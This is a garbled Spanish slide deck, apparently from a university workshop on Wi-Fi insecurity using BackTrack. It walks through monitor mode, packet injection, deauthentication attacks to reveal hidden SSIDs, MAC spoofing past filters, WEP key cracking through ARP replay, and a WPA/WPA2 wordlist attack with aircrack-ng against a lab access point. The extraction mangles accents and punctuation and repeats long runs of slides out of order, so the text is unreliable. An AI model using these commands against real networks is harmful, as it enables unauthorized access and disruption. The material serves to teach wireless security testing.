bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
